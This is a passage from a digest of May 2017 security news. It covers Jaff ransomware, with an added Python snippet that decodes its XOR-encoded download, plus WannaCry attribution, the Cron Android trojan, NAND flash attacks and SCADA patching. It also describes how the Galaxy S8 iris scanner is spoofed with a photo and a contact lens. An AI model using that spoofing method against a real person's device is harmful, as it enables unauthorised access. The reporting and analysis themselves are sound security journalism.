Last year's outcry over Microsoft's silent slurping of telemetry data from users' computers might have made the Chinese officials ask for control over telemetry in their version of Windows, preventing Microsoft from collecting data on its citizens.
So basically, Windows 10 users around the world have no option to turn off telemetry, but the Chinese government can do so.
"For more than two decades, Microsoft has had the distinct honor to work in China, learning and advancing technology together," executive vice president Terry Myerson writes on the Windows 10 Blog.
"Over the last two years, we have earnestly cooperated with the Chinese government on the security review of Windows 10. The Chinese government has the highest standards for security."
A release date for Windows 10 China Government Edition has not yet been announced, but three Chinese government groups have already announced their plans to adopt Windows 10 China Government Edition.
These three government groups are China Customs, Westone Information Technology and the City of Shanghai on the national, state-owned and regional enterprise levels, respectively.
Besides this, Lenovo has also announced its plans to be the first OEM partner to have devices that come preinstalled with Windows 10 China Government Edition.


New Jaff Ransomware Variant Emerges

25.5.2017 securityweek  Ransomware

Although it dominated headlines over the past couple of weeks, WannaCry wasn’t the only ransomware family running rampant. Another active threat was Jaff, a ransomware family that emerged just days before the WannaCry outbreak.

Right from the start, Jaff stood out because it was being distributed by the Necurs botnet and was using a similar ransom page design as Locky. Thus, it didn’t take long for security researchers to associate the new threat with the actors behind Locky and Dridex, who also launched the Bart ransomware last year.

The ransomware was appending the .jaff extension to the encrypted files and demanding a huge ransom, at around 2 Bitcoin. The infection vector was .PDF files sent as attachments in spam emails.

A newly observed Jaff variant continues to use Necurs and PDF files for infection, but moved away from the .jaff extension and the Locky-like ransom note, Brad Duncan, Palo Alto Networks threat intelligence analyst and handler at the SANS Internet Storm Center, says.

The ransomware now appends the .wlu extension to the encrypted files and uses a ransom note featuring green fonts on a dark background. The security researcher also noticed that the ransomware authors ask for a 0.35630347 Bitcoin ransom now.

First observed on Tuesday, May 23, the spam emails distributing the new Jaff variant use a fake invoice theme. These messages feature a PDF attachment that contains an embedded Word document with malicious macros designed to infect the machine with ransomware.

“The Word macros generate an initial URL to download an encoded Jaff binary, then we see one other URL for post-infection callback from an infected host. The initial HTTP request for Jaff returns an encoded binary that's been XORed with the ASCII string I6cqcYo7wQ,” Duncan reveals.
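An added example, not code from the article or from Palo Alto Networks, showing how an analyst would recover the downloaded Jaff binary from a captured HTTP response body using the XOR key quoted above. It assumes the encoding is a plain repeating-key XOR; the "binary" it decodes is a constructed minimal PE header, not a real Jaff sample.

```python
"""
Added example (not from the article or Palo Alto Networks): decode a captured
Jaff download with the repeating-key XOR described above, and check that the
result looks like a Windows PE image before handing it to further analysis.
"""
import itertools
import struct

JAFF_XOR_KEY = b"I6cqcYo7wQ"   # ASCII key quoted from Duncan's analysis


def xor_with_key(data, key=JAFF_XOR_KEY):
    """Repeating-key XOR. The operation is its own inverse, so one call
    both encodes a plaintext and decodes a captured response body."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, itertools.cycle(key)))


def looks_like_pe(data):
    """Sanity check on a decoded blob: DOS 'MZ' magic and a 'PE\\0\\0'
    signature at the offset stored in e_lfanew (DOS header offset 0x3c)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3c)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decode_response_body(body, key=JAFF_XOR_KEY):
    """Decode a captured download body and report whether it yielded a PE
    image. Returns (decoded_bytes, is_pe); a wrong key gives is_pe False."""
    decoded = xor_with_key(body, key)
    return decoded, looks_like_pe(decoded)


# Constructed stand-in for the real download: a 64-byte DOS stub whose
# e_lfanew points at offset 0x40, where a PE signature follows.
_stub = bytearray(b"MZ" + b"\x00" * 62)
struct.pack_into("<I", _stub, 0x3c, 0x40)
FAKE_PE = bytes(_stub) + b"PE\0\0" + b"\x00" * 60

# What a proxy or sandbox would have captured on the wire.
CAPTURED_BODY = xor_with_key(FAKE_PE)

if __name__ == "__main__":
    decoded, is_pe = decode_response_body(CAPTURED_BODY)
    print("on the wire starts with:", CAPTURED_BODY[:4].hex())
    print("decoded is PE:", is_pe, "| first bytes:", decoded[:2])
```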

Like the initial Jaff variant, the new version targets over 400 file types. After completing the encryption process, it drops a ransom note to inform the victim of what happened and to provide information on how they can pay the ransom.

Because of its alleged connection with a large crime group, Jaff has the potential to become a major threat fast. WannaCry might have stolen the headlines for the past days, but Jaff is slowly growing to become a prevalent threat.


Vera Enables Multi-Factor Authentication for Specific Data

25.5.2017 securityweek  Safety
Multi-factor authentication (MFA) is the security industry's response to failings in the simple and traditional userID/password authentication approach. MFA is considered to be a primary solution to help defeat phishing and to demonstrate compliance. But it suffers from one major drawback: user friction.

Put simply, MFA delays business. Users don't like it, and business managers see it as a delay in business processes. The industry is responding with attempts to reduce that friction. Earlier this week, Preempt launched a product that applies behavioral-based MFA to specified applications. Now Vera has announced an add-on to its data-centric solution that allows MFA to be limited to specified data.

Vera's methodology is to attach the additional authentication requirement to an existing data classification. Assuming particularly sensitive data is already classified within the Vera product as 'secret' (or perhaps, given the imminence of the European General Data Protection Regulation (GDPR), as 'PII'), then the additional MFA will be automatically applied to all such labeled data.

The result is that any attempted access to that data -- wherever the data is located or whomever the applicant is -- will result in an MFA challenge. This process defends the data against successful phishing (an attacker may steal log-in credentials, but won't get by the MFA challenge) and simultaneously helps ensure compliance with PII-protecting regulations.

"Providing the right level of protection to enterprise data is," explains Prakash Linga, CTO and co-founder of Vera, "key to complying with regulations like the NY DFS and the EU GDPR. Furthermore, the ability to layer context-driven authentication to specific files and emails lets companies appropriately protect their information wherever it travels."

The process does not require that all recipients of Vera MFA-protected data be Vera customers. If a protected document is sent to a trusted but external recipient, Vera will first validate the email address and then challenge the recipient with Vera's native two-factor Twilio-based authentication challenge.

"Alongside our own native capabilities, we're also launching integrations with Duo Security and RSA SecureID to let businesses simplify their multi-factor authentication strategy," announced Chuck Holland, Vera's director of product management, in an associated blog post. The Duo and SecureID integrations work 'out-of-the-box' as plug-and-play additions.

Earlier this month, Vera announced a strategic investment of $15 million led by Hasso Plattner Ventures. Yair Re'em, general partner of Hasso Plattner Ventures, said at the time his firm's first venture into cybersecurity is prompted by "the crumbling state of enterprise security [which] has clearly demonstrated the need for a fundamental paradigm shift in cybersecurity."

Talking about Vera's adoption of data-centric security over perimeter-based security, new board member Chris Rust said, "The enterprise network perimeter has collapsed and those clinging to solutions trying to save or resurrect it are fighting a battle long since lost. Vera is the driving force behind a positive and profound shift away from perimeter-based security and towards a more flexible and reliable data-centric model."

Vera's new MFA offering adds strong authentication to corporate data wherever it travels.


Ex-CIA Chief Says He Warned Russia to Stay Out of Election

25.5.2017 securityweek  CyberSpy
Former CIA director John Brennan said Tuesday that he warned Russia last summer against meddling in the US presidential election but the Russians went ahead and did it, anyway.

"It should be clear to everyone that Russia interfered in our 2016 presidential election process," Brennan said in testimony to the House Intelligence Committee, which is investigating possible collusion between Russia and President Donald Trump's campaign.

"And that they undertook the activities despite our strong protests and explicit warning they not do so," said Brennan, who served as CIA director from 2013 until January of this year when Trump took office.

Brennan told how he called the head of the Russian intelligence service, the FSB, on August 4 of last year.

"I said that all Americans, regardless of political affiliation or whom they might support in the election, cherished their ability to elect their own leaders without outside interference," Brennan said.

"I said American voters would be outraged by any attempt to interfere in the election," he added.

Brennan's interlocutor denied any Russian interference but said he would pass on the warning to President Vladimir Putin, the ex-CIA chief said.

Brennan reiterated that the CIA detected in 2016 possible signs of collusion between Trump associates and Russian officials.

Those contacts are now being investigated by committees in both chambers of the US Congress and by recently appointed special counsel Robert Mueller, a former FBI director.

"I encountered and became aware of information and intelligence that revealed contacts and interactions between Russian officials and US persons involved in the Trump campaign," Brennan said.

He said he did not know if this amounted to outright collusion.

"I know there was a sufficient basis of information and intelligence that required further investigation" by the FBI, he added.

Trump vehemently denies any collusion and says he is the victim of an unprecedented witch hunt.

Brennan also addressed news reports that Trump, in an Oval Office meeting this month with the Russian foreign minister and ambassador, shared highly classified information provided by a US ally about an Islamic State group plot to bring down civilian airliners with bombs hidden in laptop computers.

Brennan said that if these reports are true, Trump violated two intelligence protocols.

First, he said, such intelligence is not shared with ambassadors but rather through intelligence channels.

And before such intelligence is shared, the country that provided it must be warned so as not to jeopardize sources or methods, Brennan said.

"It appears, at least from the press reports, that neither did it go in the proper channels nor did the originating agency have the opportunity to clear language for it," Brennan said.

"That is a problem."


Samsung Investigating Galaxy S8 'Iris Hack'

25.5.2017 securityweek  Mobil
Samsung Electronics is investigating claims by a German hacking group that it fooled the iris recognition system of the new flagship Galaxy S8 device, the firm said Wednesday.

The launch of the Galaxy S8 was a key step for the world's largest smartphone maker as it sought to move on from last year's humiliating withdrawal of the fire-prone Galaxy Note 7s, which hammered the firm's once-stellar reputation.

But a video posted by the Chaos Computer Club (CCC), a German hacking group founded in 1981, shows the Galaxy S8 being unlocked using a printed photo of the owner's eye covered with a contact lens to replicate the curvature of a real eyeball.

"A high-resolution picture from the internet is sufficient to capture an iris," CCC spokesman Dirk Engling said, adding: "Ironically, we got the best results with laser printers made by Samsung."

A Samsung spokeswoman said it was aware of the report and was investigating.

The iris scanning technology was "developed through rigorous testing", the firm said in a statement as it sought to reassure customers.

"If there is a potential vulnerability or the advent of a new method that challenges our efforts to ensure security at any time, we will respond as quickly as possible to resolve the issue."

Samsung's hopes of competing against archrival Apple's iPhone had been pinned on the Galaxy S8 after last year's Note 7 disaster.

The recall debacle cost Samsung billions of dollars in lost profits and hammered its global credibility, forcing it to apologise to consumers and postpone the S8 launch.

But since it was released in April it has received positive reviews and strong orders.

The CCC previously demonstrated a way to defeat Apple's TouchID fingerprint sensors -- using graphite powder, a laser etching machine and wood glue -- just weeks after the first iPhone 5s hit the shelves.

Traditional PIN protection was "a safer approach than using body features for authentication", Engling said.


Apps Essential to Modern Living But Treated Carelessly: Report

25.5.2017 securityweek  Security
A new research report takes an unusual angle. Rather than analyzing a threat or an attacker, it looks at the psychology of the user -- or more specifically, the user of smartphones and apps. What it found is that the modern use of apps is so interwoven with daily life, they have almost become part of their users' DNA.

The Application Intelligence Report (AIR: PDF) is a new intelligence survey produced by A10 Networks. A10 surveyed 2,000 business and IT professionals in more than 20 different countries -- and it is important to note that these were professionals rather than unemployed teenagers glued to their phones.

The purpose, says Andrew Hickey, a director at A10 Networks, in an associated blog, is to "better understand how the global workforce's experiences and behaviors with apps impact personal and corporate security... Why they use them. Their perception of personal and business security when using them. And potential behavioral risks to businesses and IT teams."

The result is sobering, and could fuel a raft of psychology and sociology theses. It first demonstrates how apps and their use are deeply interwoven into everyday life. For example, 42% of respondents globally say they 'cannot live without their apps' while another 44% said 'it would be a struggle' to live without them.

The detail varies by both age demographic and geolocation. Newly emerged and emerging economies seem particularly attached or reliant on their apps: China (99%), India (97%), Brazil (96%) and South Korea (90%). It is the older economies that seem less reliant. Germany ranks highest of participants who say, 'I can easily live without apps' (30%), followed by France (23%), and Great Britain and Japan (21%). Similarly, respondents under the age of 40 are much more likely to say they cannot live without apps than those over 40.

This basic pattern largely repeated itself throughout the survey. For example, in an emergency that would allow people to take only one item, 45% of respondents elected to grab their phone. It was 74% in China, but only 29% in France.

While details such as these are interesting and possibly surprising (perhaps depending on the reader's geolocation and age demographic), it is the attitude towards security that becomes sobering. "At least four out of five (83%) respondents either agree or strongly agree that they think about security risks when first downloading an app," says the report, "but after that, security becomes much less of a thought or priority in dictating behavior."

One reason seems to be a belief that it is the developer, or the company IT department, that is responsible for app security. Forty-seven percent of respondents "expect to be protected from cyber-attacks by either their company or third-party app developers."

This lax personal attitude to security best shows itself in the use of passwords. One in 10 (11%) of all respondents said they never change their passwords for their apps, while another three out of 10 (29%) use the same password for the majority of their apps. Fewer than one in five (17%) use a different password for every app. The usual demographics apply: 50% of the 21-30 demographic either never change passwords or use the same password the majority of the time, compared with only 26% of those aged over 50.

Surprisingly, the US (49%) is second only to South Korea (52%) in using the same password for the majority of apps -- but less surprisingly, Germany leads in best practices for those who use different passwords (34%).

The effect of poor personal security is borne out in practice. Globally, 13% of all respondents have been the victim of identity theft. This grows to 39% in China (a figure that, pro rata, suggests more people than the entire population of the US). Thirty-one percent of respondents have had their phone hacked; and 24% of respondents under the age of 30 have had their phone stolen.

A10 Networks draws few conclusions from this report, instead inviting its study and promising to 'dig deeper' in the future. "From a cultural perspective," blogs Hickey, "IT can study the app-blended life, consider user behavior as a factor in security planning, build enterprise-wide security awareness and influence a security-minded culture.

"And from a technology perspective, IT pros can use this data to make the case for improved per-app visibility, per-app analytics, performance, removal of security blind spots and implementation of tighter controls across all application environments." But one thing is immediately obvious: companies with a BYOD policy cannot afford to leave the security of mobile devices to the user.


Target agreed to pay $18.5 Million over 2013 data breach
25.5.2017 securityaffairs Incident

Target, the US retail giant, has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.
Target, the US retail giant, has entered a settlement with the Attorneys General of 47 states and it has agreed to pay $18.5 million over the data breach suffered in 2013.

Nearly 40 Million credit and debit card accounts belonging to Target customers have been stolen during the traditional holiday shopping season in 2013.

The settlement is intended to compensate customers for the costs they incurred and for the damage the breach caused to consumers.

Target data breach

The company will pay the overall amount to all the Attorneys General involved in the investigation; $1.2 million will go to the Illinois Attorney General and roughly $1 million to the Connecticut Attorney General, who led the legal action against the company.

According to the settlement, Target agreed to implement an information security program to protect its customers.

“TARGET shall, within one hundred and eighty (180) days after the Effective Date of this Assurance, develop, implement, and maintain a comprehensive information security program (“Information Security Program”) that is reasonably designed to protect the security, integrity, and confidentiality of Personal Information it collects or obtains from Consumers.” reads the settlement.

The Information Security Program shall cover administrative, technical, and physical safeguards appropriate to:

The size and complexity of TARGET’s operations;
The nature and scope of TARGET’s activities;
The sensitivity of the Personal Information that TARGET maintains.

The company will adopt further measures to protect its customers, including network segmentation, access control and management, file integrity monitoring, whitelisting, logging, change control, and the adoption of payment card security technologies.

The settlement establishes that the security of the company’s systems must be assessed by a third party, and that the company must audit any vendor or subcontractor it works with. Recall that the hackers who broke into the company’s payment systems used an HVAC contractor as their entry point.

Target admitted last year that the data breach had cost it $290 million, the company paid $67 million to Visa card issuers, $19 million to MasterCard card issuers, over $20 million to banks and credit unions, and $10 million to the affected consumers.


The NAND Busters Data Storage Chips Vulnerable to Attack
25.5.2017 securityaffairs Vulnerability

Experts found that NAND Data Storage Chips are vulnerable to malicious programs which can corrupt data and even destroy them over time.
Researchers at Carnegie Mellon University, Seagate Technology and Swiss Federal Institute of Technology in Zürich have uncovered a potential flaw in the storage devices that power most cell phones, computers and big data centers around the world. The researchers found that the special chip arrays used to store information are vulnerable to malicious programs which can corrupt data and even destroy the chips over time.

NAND flash memory chips installed on a board array are called solid-state drives (SSDs). The SSDs have all but replaced the venerable magnetic disk hard drives, allowing manufacturers to reduce the size and weight of electronic devices. NAND flash memory chips are found inside most of the current state of the art electronics and often occupy space in our pockets from portable phones, cameras, and USB drives. They are also the heart of massive data centers that power the cloud, holding vast amounts of data for individuals, major corporations, and government.

A key feature of the NAND flash chip is its ability to store a charge without power. The NAND chip contains billions of cells each with different electrical charges which represent the binary ones and zeros that make up data. They are also controlled by an internal architecture which is designed to keep all that data in order. The researchers, working with the assistance of Intel and Seagate, found that the cells inside each chip can be corrupted by programs which abuse the sub-scale electronics and can eventually render them useless.

NAND attacks

One such exploit discovered by the researchers is a program that rapidly writes, reads and resets data inside a NAND storage chip. The attacker repeatedly performs this sequence of operations against individual chip cells holding the binary ones and zeros, causing them to overload and generate interference against other nearby “victim” cells inside the chip. The result is a phenomenon called “Parasitic Capacitance Coupling”, which changes the voltage in adjacent memory cells and thereby changes the value of the data stored inside them. The attacker can thus alter the data stored in targeted victim cells, corrupting data stored by other programs.

As chips become smaller and more powerful, the space between the electronic connections and memory cells has been reduced as well. The fact that these electronic connections are in some cases only a few molecules apart is like having bare copper wires carrying voltage lying next to each other. They often do not have to touch to create disturbance in other nearby components.

This type of interference attack has been described to be similar to a “Row hammer” attack used against the more familiar RAM (Random Access Memory) chips inside computers, where an attacker bombards a row of memory cells in repeated read-write operations, causing electrical interference that changes the values of nearby cells.

“Row hammer” attacks are deliberately introduced interference using software programs. However, Nature can also cause similar errors inside storage memory chips operating under harsh conditions. For example, solar flares and intense radiation have been known to induce the cells inside computer chips – both RAM and Flash – to change values.

Special programming techniques and manufacturing processes called “RAD” hardening had to be introduced for chips installed inside satellites, military equipment, space craft and nuclear reactors to prevent “bit flipping”, changing cell values induced by the Electro-Magnetic Pulse (EMP) of solar flares, and radiation.

According to the researchers, a malicious program can re-create the same kind of EMP electronic interference on a sub-scale. They discovered that such software can take advantage of the NAND chip design and structure to work around safeguards to target specific cells.

While the NAND memory chip can compensate for damaged cells, as more and more cells are attacked, the chip eventually becomes useless and is unable to reliably store information. The attack can dramatically reduce the usable lifetime of the chip, forcing it to be replaced. In high-end applications such as cloud storage, this replacement process usually requires an entire board or bank of chips to be replaced, an expensive and time-consuming process.

However, unlike massive cloud and computer storage arrays, the NAND flash memory chips inside consumer devices are usually not replaceable. The malicious software attack could force an entire device to be replaced such as a cell phone, notepad computer or Internet of Things device.

Researchers also discovered a second method of attack called “Read Disturb”. The attack is characterized by a malicious application performing a large number of reads in a very short amount of time, to induce “Read Disturb” errors that corrupt both data already written to the chip and data that have yet to be written. The basic concept is to corrupt unwritten blocks or cells which are not managed by the chip’s management firmware. The result is that the unused data cells are corrupted and cannot be repaired because they are outside of the chip’s management and control.

While the second level of attack does not disrupt already written data by other programs it does eventually destroy the chip and reduce its lifetime of use.

The researchers also suggested their own form of “RAD” hardening in order to reduce the chance of attacks and increase the lifetime of the NAND flash chips. The best solution was to internally buffer data being read and written to the NAND flash drive itself. The concept is that the buffer will absorb all the read and write activity and then place the data correctly into each NAND memory cell. While this method would consume additional overhead in time, up to 15%, and an additional 2 MB of storage, it would also eliminate the chip vulnerability to being corrupted by either the “Capacitance Coupling” or the “Read Disturbance” attacks.

The research paper – titled “Vulnerabilities in MLC NAND Flash Memory Programming: Experimental Analysis, Exploits, and Mitigation Techniques” is available at:

https://pdfs.semanticscholar.org/b9bc/a3c9f531002854af48de121cdcc8e0520c7f.pdf

Charles R. Smith is CEO of Softwar Inc. a US based information warfare company and a former national security journalist. You can find Softwar at https://www.softwar.net


Qatar's State News Agency Hacked by 'Unknown Entity': Official

24.5.2017 securityweek Hacking
Qatar said Wednesday its official state news agency was hacked and subsequently carried a "false statement" on sensitive regional topics attributed to the country's Emir, Sheikh Tamim bin Hamad Al-Thani.

Amid an apparent wide-scale security breach, it was also reported that the agency's official Twitter account had been attacked.

Among the issues allegedly addressed by the Qatari ruler in the statement were the Palestinian-Israeli conflict, strategic relations with Iran, and comments about Hamas.

There were also alleged negative remarks about Qatar's relationship with the new administration of US President Donald Trump.

Amid the confusion, Doha said the statement which had appeared on its website and was attributed to the country's ruler was completely untrue.

"The Qatar News Agency website has been hacked by an unknown entity," reported the Government Communications Office in a statement.

"A false statement attributed to His Highness has been published."

The communications office added that an investigation would be launched into the security breach.

The "false statement" posted online claimed the emir spoke on Tuesday, two days after the Qatari leader and Trump met in Saudi Arabia as part of the president's recent visit to the Middle East.

The remarks on QNA were picked up and reported by broadcasters in the region, including some in the United Arab Emirates.

They also caused a stir on social media in the Gulf, before Doha scrambled in the early hours of Wednesday morning to deny the claims.

Doha-based broadcaster Al Jazeera also reported that the QNA Twitter account had been hacked and "fake" reports that Qatar was withdrawing ambassadors from several countries in the region were subsequently denied.

The communications office added that the "State of Qatar will hold all those" who committed the breach accountable.

The attack on Qatar's official news agency comes just days after Doha claimed it had been the victim of an orchestrated smear campaign over its alleged "support" for terrorism.

Last weekend, Doha's communications office released an official statement claiming the gas-rich emirate was being attacked by anti-Qatar organisations.

Doha has faced criticism in some quarters for its support of rebel groups fighting Syrian President Bashar al-Assad.

In recent weeks, Qatar has been accused outright of terror funding in articles which have appeared in the American media.

Qatar is also home to the former leader of Hamas, Khaled Meshaal, who earlier this month used his Doha base, where he has lived in exile for several years, to launch a new policy document.


Russian Hackers Infected 1 Million Phones With Banking Trojan

24.5.2017 securityweek Virus
Russia Dismantles Major Cybercrime Operation Targeting Bank Accounts via Android Malware

The Russian Interior Ministry announced on Monday that authorities dismantled a major cybercrime gang that had stolen nearly $900,000 from bank accounts after infecting more than one million Android smartphones with a Trojan.

Authorities said they identified 20 suspects in Moscow and five other regions of Russia. They believe the group was led by a 30-year-old living in the city of Ivanovo.

Group-IB, the Russian cybersecurity firm that assisted the government’s investigation, reported that 16 members of the group were detained in November 2016, while the last active member was apprehended in April.

The group used an Android banking Trojan dubbed “Cron,” which researchers first spotted in March 2015, when cybercriminals had been distributing it disguised as Viber and Google Play apps.

Roughly one year later, experts noticed that someone had offered to rent an Android banking Trojan dubbed “Cron Bot.” In an analysis of the mobile malware market, IBM X-Force researchers reported in April 2016 that Cron Bot had been leased for between $4,000 and $7,000, depending on the package.

The cybercrime gang targeted by Russian authorities used spam SMS messages to deliver the Trojan to individuals in Russia. The messages informed recipients that their ads or photos had been posted on a website, and included links to a site that tricked users into downloading and installing the malware. The threat had been disguised as various apps, including Avito, Pornhub, Framaroot and Navitel.

Once it infected a device, the Trojan allowed the cybercrooks to steal and hide SMS messages coming from banks, and send SMSs to specified numbers. Since many Russian banks allow their customers to conduct transactions via SMS, these features allowed the fraudsters to transfer money from the victims’ accounts into their own.

According to Group-IB, the gang opened more than 6,000 bank accounts to which they transferred the stolen funds. Investigators said the Cron malware was used to steal an average of $100 (8,000 rubles) from 50-60 bank customers each day.

The cybercriminals managed to infect more than one million smartphones and stole nearly $900,000 (50 million rubles).

Following the success of their operation in Russia, the group decided to expand to other countries with the aid of a banking Trojan named Tiny.z, which they rented for $2,000 per month. Tiny.z uses overlay screens adapted to each targeted bank’s mobile application in order to trick victims into handing over personal and financial details that can be leveraged to steal money from their account.

The Cron gang had been planning on hitting France first, and they developed web injections for several of the country’s banks, including Credit Agricole, Assurance Banque, Banque Populaire, BNP Paribas, Boursorama, Caisse d'Epargne, Societe Generale and LCL. However, law enforcement managed to disrupt their operations before they could launch attacks on French banks.


WannaCry 'Highly Likely' Work of North Korean-linked Hackers, Symantec Says

24.5.2017 securityweek Ransomware
North Korea-linked Lazarus Hacking Group is "Highly Likely" to be Responsible for the Global "WannaCry" Ransomware Attack, Symantec Says

Analysis of the tools and infrastructure used in the WannaCry ransomware attacks reveal a tight connection between the threat and the North Korean hacking group Lazarus, Symantec claims.

The global outbreak on May 12 drew the world’s attention to WannaCry, but the threat had been active before that, the security researchers say. Over 400,000 machines have been hit by WannaCry to date, although not all had been infected, courtesy of a kill-switch domain registered shortly after the attack began.

The first WannaCry variant, however, emerged in February, and security researchers already discovered a possible tie between it and the Lazarus group, although some suggested such a connection was far-fetched.

North Korea has denied involvement in the ransomware outbreak.

The Lazarus group (also known as BlueNoroff) was previously associated with a number of devastating attacks, including the Sony Pictures hack in 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. Recently, Kaspersky suggested that the group could be the most serious threat to banks.

Symantec now says that tools previously associated with the group were found on computers infected with WannaCry. Before the May 12 attack, the ransomware was used in a small number of targeted campaigns in February, March, and April, and the variants are almost identical, save for the method of propagation (the recent version uses the NSA-linked EternalBlue exploit).

According to Symantec, these attacks show “substantial commonalities in the tools, techniques, and infrastructure used by the attackers and those seen in previous Lazarus attacks, making it highly likely that Lazarus was behind the spread of WannaCry.”

Despite that, however, “the WannaCry attacks do not bear the hallmarks of a nation-state campaign but are more typical of a cybercrime campaign,” the security researchers admit. Prior to the May 12 campaign, WannaCry was using stolen credentials to spread across infected networks and didn’t employ the leaked EternalBlue exploit.

After the first WannaCry attack in February, experts discovered three pieces of malware linked to Lazarus on the victim’s network, including the Volgmer Trojan and two variants of the Destover backdoor (the disk-wiping tool used in the Sony Pictures attacks).

Moreover, the researchers discovered that WannaCry used the Alphanc Trojan for distribution in the March and April attacks, and that this malicious program is a modified version of the Lazarus-linked Duuzer backdoor.

Symantec also found the Bravonc backdoor, which has similar code obfuscation as WannaCry and Fakepude info-stealer (also linked to Lazarus), and the Bravonc Trojan, which used the same IP addresses for command and control (C&C) as Duuzer and Destover, both linked to Lazarus.

Finally, there is the shared code between the previous WannaCry ransomware version and the Lazarus-linked Contopee backdoor.

The February WannaCry attack hit a single organization but compromised over 100 computers within two minutes after the initial infection. A variant of the Mimikatz password-dumping tool was used for compromise, with a second tool used to copy and execute WannaCry on other network computers using the stolen passwords.

In addition to these tools, the security researchers found five other pieces of malware on a second computer on the victim’s network, and three of them were linked to Lazarus: Volgmer and the two variants of Destover.

A new sample of WannaCry emerged in late March, and five organizations were infected with it. The Alphanc and Bravonc backdoors were employed in these attacks, with the former used to drop WannaCry onto the compromised computers of at least two victims. Alphanc is believed to be an evolution of Duuzer, a sub-family of the Destover wiping tool used in the Sony attacks.

These attacks hit organizations spanning a range of sectors and geographies, but Symantec found evidence of the tools used in the February attacks on the computers compromised in March and April as well.

The Bravonc Trojan was used to deliver WannaCry to the computers of at least two other victims, the security researchers say. The malware connects to a C&C server hosted at the same IP address as the IP address used by Destover and Duuzer samples, and which was also referred to in a Blue Coat report last year.

“The incorporation of EternalBlue transformed WannaCry from a dangerous threat that could only be used in a limited number of targeted attacks to one of the most virulent strains of malware seen in recent years. It caused widespread disruption, both to organizations infected and to organizations forced to take computers offline for software updates,” Symantec explained.

The security firm also notes that the passwords used to encrypt the ZIP files embedded in the WannaCry dropper are similar across versions ("wcry@123", "wcry@2016", and "WNcry@2ol7") suggesting they come from the same actor. Further, the use of a small number of Bitcoin addresses in the initial version and its limited spread indicates that it wasn’t a ransomware family shared across cybercrime groups.

“Aside from commonalities in the tools used to spread WannaCry, there are also a number of links between WannaCry itself and Lazarus. The ransomware shares some code with Backdoor.Contopee, malware that has previously been linked to Lazarus. One variant of Contopee uses a custom SSL implementation, with an identical cipher suite, which is also used by WannaCry. The cipher suite in both samples has the same set of 75 different ciphers to choose from (as opposed to OpenSSL where there are over 300),” Symantec says.

The small number of earlier WannaCry attacks provides sufficient evidence to link the ransomware to Lazarus, Symantec says, given the significant use of tools, code, and infrastructure previously associated with the group. The company also notes that the leak of the EternalBlue exploit was what turned the malware into a far more potent threat than it would have been if it had continued to use its own tools.


Average Patching Time for SCADA Flaws Is 150 Days: Report

24.5.2017 securityweek ICS
Supervisory control and data acquisition (SCADA) systems, particularly human-machine interfaces (HMI), can be a tempting target for malicious actors, but it takes vendors, on average, 150 days to patch vulnerabilities in these types of products, according to a new report from Trend Micro and the Zero Day Initiative (ZDI).

The report published on Tuesday is based on the analysis of hundreds of vulnerabilities documented in 2015 and 2016 by ICS-CERT and ZDI.

Researchers pointed out that attackers may target the HMI of a SCADA system for several reasons. Since HMI is a critical component in the management of industrial systems, including critical infrastructure, it can provide access to information that may be highly valuable in a sophisticated attack.

Attackers can also cause physical damage to SCADA equipment once they have compromised the HMI. Furthermore, malicious actors could leverage the HMI to disable alarms and notifications designed to alert operators of dangerous configurations or values.

Since HMIs are typically Windows-based applications rather than web-based apps, vulnerabilities such as cross-site scripting (XSS) and cross-site request forgery (CSRF) are less common. The most common types of flaws uncovered in the past two years are related to lack of authentication/authorization and weak default configurations (23%), memory corruption bugs (20%), credential management vulnerabilities (19%), and code injections (9%).

The average time from disclosure to the release of a patch has not improved much in the past four years. While there are some vendors that manage to patch SCADA vulnerabilities within one week of disclosure, the average time has been roughly 150 days in 2015 and 2016.

Experts pointed out that some smaller vendors, such as Cogent Real-Time Systems and Trihedral Engineering, patch vulnerabilities faster, while larger companies, such as ABB and GE, have an average response time of more than 220 days.

Average time it takes to release patches for SCADA products

Compared to other industries, SCADA vendors are roughly at the same level as cybersecurity firms when it comes to how fast they patch vulnerabilities. Vendors of popular software, such as Microsoft, Apple, Oracle and Adobe, have a response time of under 120 days, while business software developers are significantly slower, with an average of 189 days.

Trend Micro’s report includes case studies for each type of vulnerability affecting SCADA systems. The case study for memory corruption vulnerabilities describes a buffer overflow in Advantech’s WebAccess HMI, which could have been exploited to execute arbitrary code with elevated privileges.

As for credential management issues, which include hardcoded passwords and insufficiently protected credentials, the security firm shared an analysis of the MDS PulseNET product from General Electric (GE).

The case studies also cover code injections in Cogent DataHub, and authentication and authorization-related flaws in Advantech WebAccess and Siemens SINEMA Server.

The complete report, titled “Hacker Machine Interface - The State of SCADA HMI Vulnerabilities,” is available for download in PDF format.


Hackers Defeat Samsung Galaxy S8 Iris Scanner

24.5.2017 securityweek Mobil
Hackers of the Chaos Computer Club (CCC) in Germany have managed to defeat the iris recognition system on Samsung’s flagship Galaxy S8 smartphones.

The Samsung Galaxy S8 has several biometrics-based authentication systems, including face recognition, a fingerprint scanner, and an iris scanner. The iris authentication, which allows users to unlock their device and authorize payments, is advertised by Samsung as “one of the safest ways to keep your phone locked.”

While an individual’s iris is unique, researchers from CCC showed that Samsung’s iris scanner can be defeated by showing it a picture of the victim’s eye. It’s worth noting that members of the CCC were the first to bypass Apple’s fingerprint-based Touch ID system after its introduction in 2013.

Experts say there are several ways to obtain iris data, including from high-resolution pictures posted by users themselves on the Internet. Another method is to take a picture of the targeted individual’s eye using a digital camera with night-shot mode or the infrared filter disabled.

Researchers demonstrated that a camera with a 200mm lens can capture a usable picture of the iris from up to five meters (16 feet).

“In the infrared light spectrum – usually filtered in cameras – the fine, normally hard to distinguish details of the iris of dark eyes are well recognizable,” the CCC said. “Depending on the picture quality, brightness and contrast might need to be adjusted.”

Once the picture of the iris has been obtained, it can be printed out using a laser printer – the best results were, ironically, obtained on a Samsung printer. The last step is to place a contact lens on top of the print to mimic the curvature of a real eye. Placing the photo in front of the Galaxy S8’s iris scanner successfully unlocks the device.

SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

This is not the first time someone has targeted the biometrics features of the Samsung Galaxy S8. It was demonstrated a few weeks ago that the smartphone’s face recognition system can be bypassed simply by showing it a picture of the targeted user’s face.

